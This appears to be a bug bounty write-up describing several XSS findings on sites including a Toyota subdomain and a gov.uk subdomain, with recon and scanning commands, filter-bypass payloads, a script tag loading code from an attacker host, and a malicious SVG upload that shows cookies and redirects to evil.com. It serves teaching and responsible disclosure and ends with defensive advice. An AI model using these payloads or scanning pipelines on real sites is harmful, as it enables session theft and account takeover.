How I Found Multiple XSS Vulnerabilities Using Unknown Techniques


Khaledyassen

InfoSec Write-ups

Hello, everyone. I hope you are well.

In the name of Allah, the Most Gracious, the Most Merciful.

Today I’m going to talk about multiple XSS attacks using different techniques, which I discovered while working on various bug bounty programs.

XSS (cross-site scripting) is a security vulnerability that occurs when an attacker injects malicious scripts into web pages viewed by other users. XSS attacks aim to execute malicious scripts in the context of a victim’s browser, allowing the attacker to steal sensitive information. For example, an attacker who can inject something like:

<script src=https://attacker_Server.com/attack.js></script>
// Loads a malicious JavaScript file from the attacker's server, which can perform
// malicious actions such as stealing the victim's session cookies and taking over the account.

1] Reflected XSS: the simplest type of XSS. It happens when an application receives data in an HTTP request and includes that data in the response unsafely. Example: say a website has a category parameter for filtering clothes, such as “https://example.com?category=t-shirt”, and this value is reflected unsafely in the response as <p>t-shirt</p>. That means we can inject a payload like <p><script>alert(document.cookie)</script></p> to grab the session cookie.
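To make that concrete, here is a minimal sketch of the unsafe reflection described above, written as a hypothetical Node/Express handler (my own illustration, not from any real target): the category parameter is concatenated straight into the HTML response.

const express = require('express');
const app = express();

// UNSAFE: the attacker-controlled query parameter is echoed into the
// HTML response without any encoding, so <script> payloads execute.
app.get('/', (req, res) => {
  res.send(`<p>${req.query.category}</p>`);
});

app.listen(3000);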

2] DOM XSS: occurs when JavaScript takes data from an attacker-controllable source, such as the URL, and passes it to a sink that supports dynamic code execution, such as eval() or innerHTML. This lets attackers execute malicious JavaScript. The most important thing to understand in depth about DOM XSS is sources and sinks; for more information, see PortSwigger.
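As a hedged illustration of source and sink (my own minimal example, assuming a page with an element whose id is "greeting"): the URL fragment is the source, and innerHTML is the sink.

// Source: the attacker controls the URL fragment
var name = decodeURIComponent(location.hash.slice(1));

// Sink: the value becomes live HTML without encoding.
// Visiting https://example.com/#<img src=x onerror=alert(document.domain)>
// makes the injected event handler fire.
document.getElementById('greeting').innerHTML = 'Hello ' + name;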

3] Stored XSS: happens when an application receives data from an untrusted source and unsafely includes that data in its later HTTP responses. Example: suppose a website lets users submit comments on blog posts that are displayed to other users. An attacker submits a malicious comment, the comment is stored on the server, and when other users view it, the attacker’s script runs in their browsers and steals their data.
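A minimal sketch of the stored variant (again a hypothetical Express app, with an in-memory array standing in for a database): comments are persisted and later echoed into every visitor’s page without encoding.

const express = require('express');
const app = express();
const comments = []; // stands in for a database

app.use(express.urlencoded({ extended: false }));

// UNSAFE: the comment is stored verbatim...
app.post('/comment', (req, res) => {
  comments.push(req.body.text);
  res.redirect('/');
});

// ...and replayed into the HTML unencoded for every visitor
app.get('/', (req, res) => {
  res.send(comments.map(c => `<p>${c}</p>`).join(''));
});

app.listen(3000);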

There is much more to say about XSS, but I will share some references at the end of the article. Now it's time for the bugs I found.

* Critical DOM XSS in Toyota:

$Keys$: automation tools [gau + Dalfox + etc.]

Now, we have a Toyota domain and we need to gather its subdomains. You can use tools like Sublist3r, Subfinder, Assetfinder, Amass, etc., then filter the results with httpx to keep only the live subdomains.

httpx -l subdomains.txt -o httpx.txt
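# (-l) input file of subdomains && (-o) save the live hosts to httpx.txt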

Now let’s gather the endpoints from the Wayback Machine and Common Crawl:

echo "toyota.com" | gau --threads 5 >> Enpoints.txtcat httpx.txt | katana -jc >> Enpoints.txt

Because most of these URLs are duplicates, we get rid of them with:

cat Endpoints.txt | uro >> Endpoints_F.txt

gau: a tool that fetches known URLs from the Wayback Machine for any domain.

katana: a powerful tool focused on deep web crawling.

uro: a good tool for filtering uninteresting/duplicate content from the gathered endpoints. For example, if we have multiple URLs like https://example.com?id=1 and https://example.com?id=2, it collapses them into a single URL.

Note: you can automate all of the previous steps with a script around the tools you use, as most security researchers do, to make the process easier. I will share my scripts in future writeups.

Now we have a lot of endpoints and need to filter them before working. I use the awesome gf tool, which filters endpoints based on the patterns provided; for example, there are patterns for XSS, SQLi, SSRF, etc. You can use any public patterns from GitHub, like this one, and add them to the “~/.gf” directory.

cat Endpoints_F.txt | gf xss >> XSS.txt
# For getting the endpoints that have parameters which may be vulnerable to XSS

Then we use the Gxss tool to find parameters whose values are reflected in the response.

cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt
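# (-p khXSS) replace each parameter value with the canary string "khXSS" && (-o) save the URLs where the canary is reflected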

In this process you have two options: the first is testing manually, and the second is using an XSS automation tool and confirming the results manually. Our file is huge, so I used the Dalfox automated XSS scanner.

dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt
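# Scan every URL in XSS_Ref.txt for XSS and write the confirmed findings to Vulnerable_XSS.txt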

I found a vulnerable subdomain, let’s call it sub.toyota.com, so let’s find out what is happening.

When I navigated to the vulnerable URL [https://sub.toyota.com/direcrory/?dir=%3C%2Fscript%3E%3Cscript%3Econfirm%28document.domain%29%3C%2Fscript%3E], I got a popup message.

At that moment I wondered whether this was the only vulnerable parameter or whether there were others, and why this happened. I found a lot of vulnerable parameters.

I looked at the response and found that the vulnerable parameters from the URL [the source] end up inside different JavaScript variables like “var returnUrl=” and “var applicationUri=”. Look at this JavaScript code to understand the idea:

<script>
// Assuming the URL is http://test.com?param=test
var urlParams = new URLSearchParams(window.location.search);
var paramValue = urlParams.get('param');

// UNSAFE: document.write inserts the raw parameter value into the page
// while it is being parsed, so injected markup (including script tags) executes
document.write(paramValue);
</script>
<!-- Note that the parameter value is written into the page without any sanitization. -->
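To see why the %3C%2Fscript%3E payload works, here is a hedged reconstruction (my own illustration, not Toyota's actual markup) of the pattern: the parameter value lands inside a JavaScript string in an inline script block.

<script>
// Imagine the server prints ?dir=USER_INPUT here:
var returnUrl = "USER_INPUT";
</script>
<!-- If USER_INPUT is </script><script>confirm(document.domain)</script>, the HTML
parser closes the first script block at the injected </script> (it does not care
that it appears inside a JavaScript string) and then executes the second one. -->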

Let's open the following URL to check whether the session cookie has any protection (e.g., the HttpOnly flag): [https://sub.toyota.com/direcrory/?dir=%3C%2Fscript%3E%3Cscript%3Econfirm%28document.cookie%29%3C%2Fscript%3E]

Unfortunately, it was not protected, which means I could perform a full account takeover on any user [RXSS]. I reported the vulnerability in full detail, and it was accepted🙂.

* Medium Reflected XSS in bug bounty programs ($$$):

$Keys$: Hidden parameter — Manual testing.

Reflected XSS is one of the most common bugs and is easy to find, but I will talk about a specific scenario that I have faced multiple times.

After doing my recon and collecting all relevant information on targets.com, I gathered endpoints and discovered a very interesting one at [https://tst2.dev.targets.com/cgi-bin/fr.cfg/php/custom/id-pass.php]. It gave me the following page.

When I navigated to the base URL, I received a 403 Forbidden.

I used my custom wordlist with the dirsearch tool to fuzz the base URL and the other endpoints.

dirsearch -u https://tst2.dev.targets.com/ -w wordlist.txt -e php,cgi,htm,html,shtm,shtml,js,txt --random-agent
# (-u) the target && (-w) custom wordlist to use && (-e) extensions to test && (--random-agent) randomize the User-Agent for each request

But I did not get anything important. But wait, what about hidden parameters? Let’s scan [https://tst2.dev.targets.com/cgi-bin/fr.cfg/php/custom/id-pass.php] with the Arjun tool or the Param Miner extension, which fuzz the URL using different request types (GET, POST, JSON, and XML) to find valid parameters.

arjun -u https://tst2.dev.targets.com/cgi-bin/fr.cfg/php/custom/id-pass.php -m GET -w Parameters_Fuzz.txt
# (-u) for our target && (-m GET) sending requests using the GET method && (-w) for custom wordlist that would be used with the tool

The response

So let’s work on the auth_status parameter and try different injections like XSS, SQLi, etc. I will not cover every injection, to avoid wasting time, and will focus on the reflected XSS.

When I injected the string khxss into the parameter value, it was reflected in the response. Then I navigated to [https://tst2.dev.targets.com/cgi-bin/fr.cfg/php/custom/id-pass.php?auth_status=%3Cscript%3Econfirm%285%29%3C%2Fscript%3E] to understand how the server handles the requests, and I got a 403 Forbidden.

The first and easiest way to bypass this kind of protection is to manipulate the payload: change how you write it, for example (<sCrIpT>alert(1)</ScRipt>) or (<scr<script>ipt>), among other techniques, because developers often make the mistake of blacklisting only specific words. You can automate this with public wordlists, but when I tried [https://tst2.dev.targets.com/cgi-bin/fr.cfg/php/custom/id-pass.php?auth_status=%3CsCriPt%3Econfirm%28documen.cookie%29%3C%2FScRipt%3E], it was accepted and we got our XSS.
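To see why case-mixing works, here is a hedged sketch (hypothetical, not the target's actual filter) of the kind of naive blacklist that these payloads defeat:

// The filter only strips the exact lowercase tokens
function naiveFilter(input) {
  return input.replace(/<script>/g, '').replace(/<\/script>/g, '');
}

naiveFilter('<script>alert(1)</script>'); // -> 'alert(1)'   (payload neutered)
naiveFilter('<sCriPt>alert(1)</sCriPt>'); // -> unchanged    (case differs, tag survives)
naiveFilter('<scr<script>ipt>alert(1)');  // -> '<script>alert(1)' (stripping rebuilds the tag)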

It is not the end, pro :). When you find something like this, check whether the sibling subdomains are vulnerable to the same bug. That is what I did: I gathered subdomains for [*.dev.targets.com] and found about four vulnerable ones, but when I reported them the triage team accepted them as one vulnerability, and I finally got the bounty🙂.

Note: you can use the ffuf tool to fuzz the subdomain part of the full URL:

ffuf -u "https://FUZZ.dev.targets.com/cgi-bin/fr.cfg/php/custom/id-pass.php?auth_status=%3CsCriPt%3Econfirm%28documen.cookie%29%3C%2FScRipt%3E" -w subdomains.txt -c -v
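# FUZZ marks where each word from subdomains.txt is inserted && (-c) colorized output && (-v) verbose output with full URLs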

* High Stored XSS via SVG file upload:

$keys$: File upload — Manual testing.

After my recon ended, I looked at the Aquatone results (Aquatone takes screenshots of subdomains) and discovered an interesting subdomain, so let’s work on it.

The URL https://sub.gov.uk/ is our goal. When you begin testing a target, you must understand all of its functions, such as [Register - Login - Forget_password - etc.].

When I went to create an account via the Register form, I found several fields that had to be filled in, such as username, email, password, organization name, and an association with a manufacturer.

Let’s add a payload to the username input like:

"><img src=x onerror=alert(document.domain)>{{7*7}}'
<!-- This payload tests for several vulnerabilities at once: the img tag tests for XSS (you can also use your XSS Hunter payload), {{7*7}} tests for SSTI, and the trailing single quote tests for SQLi. -->

We cannot see whether it is vulnerable until we fill in all the empty inputs, so let’s continue. But wait, I can’t, because the username field has protection against malicious words. We could manipulate it with different techniques (changing the payload, encoding the content, and so on), but first let’s see whether all inputs have the same protection. The organization form has multiple fields to fill in, like organization name, address, country, etc., so I added the payload to the organization name.

It was accepted and our XSS payload was executed.

Okay, I didn’t stop here, because many things still needed to be tested, but I will focus on the file upload field in the relationship form.

File Upload vulnerability: A file upload vulnerability occurs when a website allows users to upload files without proper validation or sanitization of the input. This can lead to various security issues, including the execution of malicious scripts or the upload of harmful files that can compromise the system or steal sensitive information.

When you begin testing for file upload vulnerabilities, many things need to be checked, so I recommend reading the following post, which covers most file upload techniques: Here. But we will focus on the SVG file.

What is SVG? Scalable Vector Graphics (SVG) is an XML-based vector image format that can contain interactive and animated graphics. SVG files can also include JavaScript code, which can be used for various tasks, including animation. Because SVG files can be treated as images in HTML, they can be placed in an image tag and will render perfectly, like <img src="rectangle.svg" alt="Rectangle" height="20" width="30">.

The SVG file ("rectangle.svg") can be something like the following:

<svg width="200" height="100" xmlns="http://www.w3.org/2000/svg">
<rect x="20" y="20" width="160" height="60" fill="blue" />
</svg>
<!-- An SVG file that draws a blue rectangle -->

I was able to upload an SVG file containing a malicious script, which was not properly sanitized, leading to the execution of the script.

Here is the malicious SVG file that I created

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("You have been hacked !! " + "\n" + "Domain: " + document.domain + "\n" + "Cookie: " + document.cookie );
window.location.href="https://evil.com"
</script>
</svg>

Let’s upload it.

Then I navigated to the uploaded file.

Yup, we got our stored XSS.

I reported the vulnerability in full detail, and it was accepted🙂.

Here’s the POC video.

* XSS with unknown technique:

$keys$: robots.txt — User-agent — Burp Suite.

Let’s say that we have https://targets.com. I looked at it, but I only found one page, which gave me an internal error. Nothing important. When I fuzzed it, there was nothing except the following robots.txt file:

If you are a CTF player or have played CTF before, the following thought will come to mind naturally:

What would happen if I went to the /settings page and replaced the User-Agent in the request with the values seen in the response?

When I intercepted the request with Burp Suite and changed the User-Agent to Mediapartners-Google, I didn’t discover anything new on the /settings page, but I found a lot of accessible pages, meaning we now had a whole new web app. I didn’t expect something like that.
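Outside Burp, the same check can be scripted. Here is a hedged sketch (Node 18+ with its built-in fetch; the URL is a placeholder, not the real target): request the same page with a normal browser User-Agent and with the crawler one, then compare the status codes.

const url = 'https://targets.com/settings'; // placeholder target

(async () => {
  for (const ua of ['Mozilla/5.0', 'Mediapartners-Google']) {
    const res = await fetch(url, { headers: { 'User-Agent': ua } });
    console.log(ua, '->', res.status); // e.g. 403 vs 200 reveals User-Agent-based gating
  }
})();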

As with most of the targets we work on, manual and automated methods are our keys.

After running the Burp Suite scan I discovered a few useful findings, one of which was an XSS vulnerability. Here are all of the details about the vulnerability I found.

Go to Burp Suite -> Proxy -> Intercept.

Go to Options in the Intercept section.

Go to Match and Replace, then replace the User-Agent with the new one (Mediapartners-Google) so that all requests are sent with it.

Go to our vulnerable URL: https://targets.com//bundle/cardjdv1i”><script>alert(document.cookie)</script>mnybm?id=25020&timestamp=1704865352

We got our XSS.

When I changed the User-Agent back to confirm that the misconfiguration came from it, I did not get anything, so it was time to report our vulnerability.

Look at the following code to understand what may be happening:

<!-- This is just a simple example of JavaScript code, not the actual code -->
<html>
<body>
<p>This <span id="exampleElement"></span></p>
<script>
// Get the User-Agent value the browser sent with the request
var userAgent = navigator.userAgent;

// Check whether the User-Agent contains "Mediapartners-Google"
if (userAgent.indexOf("Mediapartners-Google") !== -1) {
  // Assuming the URL is https://targets.com/bundle/<user-input>/
  var userInput = window.location.pathname.split("/")[2];
  // UNSAFE sink: the path segment becomes live HTML without encoding.
  // (Note: innerHTML does not run a bare <script> tag, but it does run
  // event-handler payloads such as <img src=x onerror=alert(document.cookie)>.)
  document.getElementById("exampleElement").innerHTML = userInput;
}
</script>
</body>
</html>

When I reported it, it was not accepted because the subdomain was out of scope, but I did not mind, because it is an unknown technique and I wanted to show you that you must not leave anything you find untested; keep working hard.

Here’s the POC video.

In this section, we will talk briefly about how developers can protect their websites from XSS attacks:

1] Validate and Sanitize Input: Always validate and sanitize user input to prevent the injection of malicious scripts.

2] Use Content Security Policy (CSP): CSP is a security feature that helps prevent cross-site scripting and other code injection attacks.

3] Output Encoding: When outputting user-supplied data, encode it to prevent the browser from interpreting it as HTML (see the sketch after this list).

4] Implement a WAF (Web Application Firewall): A WAF can help filter out malicious requests and prevent XSS attacks.
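As a hedged sketch of points 2 and 3 above (a hypothetical Express app, not a complete defense): encode user data before it reaches HTML, and send a CSP header.

const express = require('express');
const app = express();

// 3] Output encoding: neutralize HTML metacharacters in user data
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

// 2] CSP: only allow scripts from our own origin
app.use((req, res, next) => {
  res.setHeader('Content-Security-Policy', "default-src 'self'; script-src 'self'");
  next();
});

app.get('/', (req, res) => {
  // The reflected value is now inert text, not markup
  res.send(`<p>${escapeHtml(req.query.category ?? '')}</p>`);
});

app.listen(3000);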

It is the end of our article, and I hope you found it useful.
